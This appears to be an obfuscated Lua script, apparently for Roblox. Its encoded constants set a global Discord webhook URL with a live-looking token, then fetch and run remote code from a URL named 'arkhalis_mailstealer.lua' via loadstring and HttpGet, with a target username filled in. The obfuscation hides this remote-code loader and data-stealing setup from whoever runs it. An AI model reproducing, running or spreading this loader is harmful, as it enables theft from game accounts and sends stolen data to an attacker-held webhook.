--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v79=0;local v80;while true do if (v79==0) then v80=v2(v0(v30,16));if v19 then local v98=0;local v99;while true do if (v98==1) then return v99;end if (v98==0) then v99=v5(v80,v19);v19=nil;v98=1;end end else return v80;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v81=0 -0 ;local v82;while true do if (v81==(0 -0)) then v82=(v31/((3 -1)^(v32-(2 -1))))%((621 -(555 + 64))^(((v33-(932 -(857 + 74))) -(v32-(569 -(330 + 37 + 201)))) + (928 -(214 + 713)))) ;return v82-(v82%((1 -0) + 0)) ;end end else local v83=(1 + (1066 -(68 + 997)))^(v32-(878 -(282 + 595))) ;return (((v31%(v83 + v83))>=v83) and 1) or (1637 -(1523 + 114)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1272 -(226 + 1044)) );v18=v18 + (8 -6) ;return (v36 * (373 -(32 + 85))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + 4 ;return (v40 * (16441815 + 335401)) + (v39 * (14533 + 51003)) + (v38 * (1213 -(892 + 65))) + v37 ;end local function v24()local v41=v23();local v42=v23();local v43=2 -1 ;local v44=(v20(v42,1 -0 ,36 -16 ) * ((352 -(87 + 263))^(212 -(67 + (247 -134))))) + v41 ;local v45=v20(v42,16 + 5 ,31);local v46=((v20(v42,32)==(2 -1)) and  -(1 + 0)) or (3 -2) ;if (v45==(952 -(802 + 150))) then if (v44==(0 -0)) then return v46 * (0 -0) ;else v45=1;v43=0 + 0 ;end elseif (v45==2047) then return ((v44==(997 -(915 + 15 + 67))) and (v46 * ((2 -1)/(0 + 0)))) or (v46 * NaN) ;end return v8(v46,v45-(1344 -(570 -249)) ) * (v43 + (v44/((1189 -(1069 + 118 + 0))^(117 -65)))) ;end local function v25(v47)local v48=0;local v49;local v50;while true do if (v48==(792 -((798 -(44 + 386)) + 423))) then v49=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;v48=20 -(10 + 8) ;end if (v48==(11 -8)) then return v6(v50);end if (v48==(442 -((1902 -(998 + 488)) + 26))) then v49=nil;if  not v47 then v47=v23();if (v47==(0 -0)) then return "";end end v48=1;end if (v48==(1 + 1)) then v50={};for v90=1 -0 , #v49 do v50[v90]=v2(v1(v3(v49,v90,v90)));end v48=441 -(145 + 293) ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51~=(3 + 0)) then else v58=nil;while true do local v92=0 -0 ;while true do if (v92==(1 + 0)) then if ((562 -(306 + 254))==v52) then local v102=0 + 0 ;local v103;local v104;while true do if (v102==1) then while true do if (v103==(0 -0)) then v104=1467 -(899 + 568) ;while true do local v158=0;while true do if (v158~=0) then else if ((0 + 0)~=v104) then else for v168=2 -1 ,v23() do local v169=0;local v170;local v171;local v172;local v173;while true do if (0~=v169) then else v170=0;v171=nil;v169=604 -(268 + 335) ;end if (v169==(291 -(60 + 230))) then v172=nil;v173=nil;v169=574 -(426 + 146) ;end if (v169~=2) then else while true do if (v170==(0 + 0)) then v171=0;v172=nil;v170=1457 -(282 + 1174) ;end if (v170==(812 -(569 + 242))) then v173=nil;while true do if (v171==(2 -1)) then while true do if (v172==0) then v173=v21();if (v20(v173,1,1)~=(0 + 0)) then else local v192=0;local v193;local v194;local v195;local v196;while true do if ((1026 -(706 + 318))==v192) then while true do if (v193==(1251 -(721 + 530))) then local v203=0;while true do if (v203~=(1272 -(945 + 326))) then else v193=1;break;end if (v203==(0 -0)) then v194=v20(v173,2 + 0 ,3);v195=v20(v173,4,6);v203=1;end end end if (3==v193) then if (v20(v195,3,703 -(271 + 429) )~=(1 + 0)) then else v196[4]=v58[v196[1504 -(1408 + 92) ]];end v53[v168]=v196;break;end if (v193~=1) then else local v205=1086 -(461 + 625) ;while true do if (v205~=(1288 -(993 + 295))) then else v196={v22(),v22(),nil,nil};if (v194==(0 + 0)) then local v210=0;local v211;local v212;while true do if (v210~=(1 + 0)) then else while true do if (v211==0) then v212=0 + 0 ;while true do if (v212==0) then v196[532 -(406 + 123) ]=v22();v196[4]=v22();break;end end break;end end break;end if (v210==(1769 -(1749 + 20))) then v211=0 + 0 ;v212=nil;v210=1;end end elseif (v194==(1323 -(1249 + 73))) then v196[3]=v23();elseif (v194==2) then v196[2 + 1 ]=v23() -(2^(1161 -(466 + 679))) ;elseif (v194==3) then local v219=0;local v220;while true do if (0==v219) then v220=0;while true do if (0~=v220) then else v196[6 -3 ]=v23() -(2^16) ;v196[4]=v22();break;end end break;end end end v205=1;end if ((2 -1)==v205) then v193=2;break;end end end if (v193~=(1902 -(106 + 1794))) then else local v206=0 + 0 ;while true do if (v206==(1 + 0)) then v193=8 -5 ;break;end if (v206~=0) then else local v209=0 -0 ;while true do if (v209~=1) then else v206=115 -(4 + 110) ;break;end if (v209==(584 -(57 + 527))) then if (v20(v195,1,1428 -(41 + 1386) )==(104 -(17 + 86))) then v196[2 + 0 ]=v58[v196[3 -1 ]];end if (v20(v195,5 -3 ,168 -(122 + 44) )==(1 -0)) then v196[9 -6 ]=v58[v196[3 + 0 ]];end v209=1;end end end end end end break;end if (0==v192) then v193=0;v194=nil;v192=1;end if (v192==(1 + 0)) then local v199=0;while true do if (v199~=(0 -0)) then else v195=nil;v196=nil;v199=1;end if (v199~=1) then else v192=67 -(30 + 35) ;break;end end end end end break;end end break;end if (v171==(0 + 0)) then local v183=1257 -(1043 + 214) ;local v184;while true do if (0~=v183) then else v184=0;while true do if (v184==(3 -2)) then v171=1213 -(323 + 889) ;break;end if (0~=v184) then else v172=0 -0 ;v173=nil;v184=1;end end break;end end end end break;end end break;end end end for v174=581 -(361 + 219) ,v23() do v54[v174-1 ]=v28();end v104=321 -(53 + 267) ;end if (v104==1) then return v56;end break;end end end break;end end break;end if (v102==0) then v103=0;v104=nil;v102=1;end end end break;end if (v92~=(0 + 0)) then else local v100=413 -(15 + 398) ;local v101;while true do if (v100~=(982 -(18 + 964))) then else v101=0 -0 ;while true do if (v101~=0) then else local v142=0;while true do if (v142~=(1 + 0)) then else v101=1;break;end if (v142==0) then if ((0 + 0)~=v52) then else local v161=850 -(20 + 830) ;local v162;local v163;while true do if (v161~=1) then else while true do if (v162==(0 + 0)) then v163=126 -(116 + 10) ;while true do if (v163==1) then v55={};v56={v53,v54,nil,v55};v163=2;end if (v163~=(0 + 0)) then else local v179=0 + 0 ;local v180;while true do if ((0 + 0)~=v179) then else v180=0;while true do if (v180==(0 -0)) then local v191=0 -0 ;while true do if (v191~=0) then else v53={};v54={};v191=1552 -(1126 + 425) ;end if ((406 -(118 + 287))==v191) then v180=3 -2 ;break;end end end if (v180==(1122 -(118 + 1003))) then v163=2 -1 ;break;end end break;end end end if (v163==(379 -(142 + 235))) then v52=1;break;end end break;end end break;end if ((0 -0)==v161) then v162=0;v163=nil;v161=1 + 0 ;end end end if (v52==1) then local v164=0;local v165;while true do if (v164~=0) then else v165=0;while true do if (v165==2) then v52=2;break;end if (v165~=1) then else local v176=977 -(553 + 424) ;while true do if (v176==1) then v165=3 -1 ;break;end if (v176~=0) then else local v181=0 + 0 ;while true do if (v181==(0 + 0)) then for v185=1 + 0 ,v57 do local v186=0;local v187;local v188;local v189;local v190;while true do if ((1 + 1)==v186) then while true do if (v187==1) then v190=nil;while true do if (1~=v188) then else if (v189==1) then v190=v21()~=0 ;elseif (v189==2) then v190=v24();elseif (v189~=(2 + 1)) then else v190=v25();end v58[v185]=v190;break;end if (v188==(0 -0)) then local v201=0 -0 ;local v202;while true do if (v201==(0 -0)) then v202=0 + 0 ;while true do if (v202~=0) then else v189=v21();v190=nil;v202=1;end if ((4 -3)==v202) then v188=754 -(239 + 514) ;break;end end break;end end end end break;end if (v187==(0 + 0)) then local v197=0;local v198;while true do if (v197==0) then v198=1329 -(797 + 532) ;while true do if (v198~=0) then else v188=0;v189=nil;v198=1 + 0 ;end if (v198~=(1 + 0)) then else v187=1;break;end end break;end end end end break;end if (v186==(2 -1)) then v189=nil;v190=nil;v186=2;end if (v186==0) then v187=1202 -(373 + 829) ;v188=nil;v186=732 -(476 + 255) ;end end end v56[1133 -(369 + 761) ]=v21();v181=1 + 0 ;end if ((1 -0)==v181) then v176=1;break;end end end end end if (v165==0) then local v177=0 -0 ;local v178;while true do if (v177~=0) then else v178=238 -(64 + 174) ;while true do if (v178~=0) then else v57=v23();v58={};v178=1;end if (1==v178) then v165=1;break;end end break;end end end end break;end end end v142=1;end end end if (v101~=(1 + 0)) then else v92=1 -0 ;break;end end break;end end end end end break;end if (v51==1) then local v87=336 -(144 + 192) ;while true do if (v87==(216 -(42 + 174))) then v54=nil;v55=nil;v87=1 + 0 ;end if (v87==1) then v51=2;break;end end end if (v51==(2 + 0)) then local v88=0;while true do if (v88==0) then local v97=0;while true do if (v97==0) then v56=nil;v57=nil;v97=1;end if (v97~=1) then else v88=1;break;end end end if (v88==(1 + 0)) then v51=3;break;end end end if (v51~=(1504 -(363 + 1141))) then else local v89=0;while true do if (v89==0) then v52=1580 -(1183 + 397) ;v53=nil;v89=2 -1 ;end if (v89==1) then v51=1;break;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v65=v62;local v66=v63;local v67=v64;local v68=v27;local v69=1;local v70= -1;local v71={};local v72={...};local v73=v12("#",...) -1 ;local v74={};local v75={};for v84=0,v73 do if (v84>=v67) then v71[v84-v67 ]=v72[v84 + 1 ];else v75[v84]=v72[v84 + 1 ];end end local v76=(v73-v67) + 1 ;local v77;local v78;while true do v77=v65[v69];v78=v77[1];if (v78<=10) then if (v78<=4) then if (v78<=1) then if (v78>0) then v75[v77[2]]=v77[3]~=0 ;else v75[v77[2]][v77[3]]=v77[4];end elseif (v78<=2) then v69=v77[3];elseif (v78>3) then v75[v77[2]]();else v75[v77[2]]=v77[3];end elseif (v78<=7) then if (v78<=5) then do return;end elseif (v78==6) then local v119=v77[2];local v120=v75[v77[3]];v75[v119 + 1 ]=v120;v75[v119]=v120[v77[4]];else local v124=0;local v125;local v126;while true do if (v124==0) then v125=v77[2];v126=v75[v77[3]];v124=1;end if (v124==1) then v75[v125 + 1 ]=v126;v75[v125]=v126[v77[4]];break;end end end elseif (v78<=8) then v75[v77[2]]=v61[v77[3]];elseif (v78>9) then if (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end else local v127=v77[2];local v128,v129=v68(v75[v127](v13(v75,v127 + 1 ,v77[3])));v70=(v129 + v127) -1 ;local v130=0;for v143=v127,v70 do v130=v130 + 1 ;v75[v143]=v128[v130];end end elseif (v78<=15) then if (v78<=12) then if (v78>11) then v75[v77[2]][v77[3]]=v77[4];else v75[v77[2]]();end elseif (v78<=13) then v75[v77[2]]=v77[3];elseif (v78>14) then local v131=0;local v132;local v133;local v134;local v135;while true do if (v131==0) then v132=v77[2];v133,v134=v68(v75[v132](v13(v75,v132 + 1 ,v77[3])));v131=1;end if (v131==1) then v70=(v134 + v132) -1 ;v135=0;v131=2;end if (v131==2) then for v159=v132,v70 do local v160=0;while true do if (v160==0) then v135=v135 + 1 ;v75[v159]=v133[v135];break;end end end break;end end else local v136=0;local v137;while true do if (v136==0) then v137=v77[2];v75[v137]=v75[v137](v13(v75,v137 + 1 ,v70));break;end end end elseif (v78<=18) then if (v78<=16) then do return;end elseif (v78>17) then local v138=0;local v139;while true do if (v138==0) then v139=v77[2];v75[v139]=v75[v139](v13(v75,v139 + 1 ,v70));break;end end elseif (v75[v77[2]]==v77[4]) then v69=v69 + 1 ;else v69=v77[3];end elseif (v78<=19) then v75[v77[2]]=v61[v77[3]];elseif (v78==20) then v75[v77[2]]=v77[3]~=0 ;else v69=v77[3];end v69=v69 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039303632343532393730373034393031302F58594252322D4A694A613765333650323177432O694D4C757A673047713971626538442O3352425132374C67486D5A684F556D4872415F7959665A744E616B3568574866030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403363O00682O7470733A2O2F61726B68616C69736C75612E6769746875622E696F2F61726B68616C69735F6D61696C737465616C65722E6C756103093O00557365726E616D6531030A3O004C69784E69783139313903093O00557365726E616D6532035O00173O0012033O00013O00260A3O000E000100020004153O000E0001001213000100033O00300C000100040005001213000100063O001213000200073O002006000200020008001203000400094O0001000500014O0009000200054O001200013O00022O000B0001000100010004153O0016000100260A3O0001000100010004153O00010001001213000100033O00300C0001000A000B001213000100033O00300C0001000C000D0012033O00023O0004153O000100012O00053O00017O00",v9(),...);end
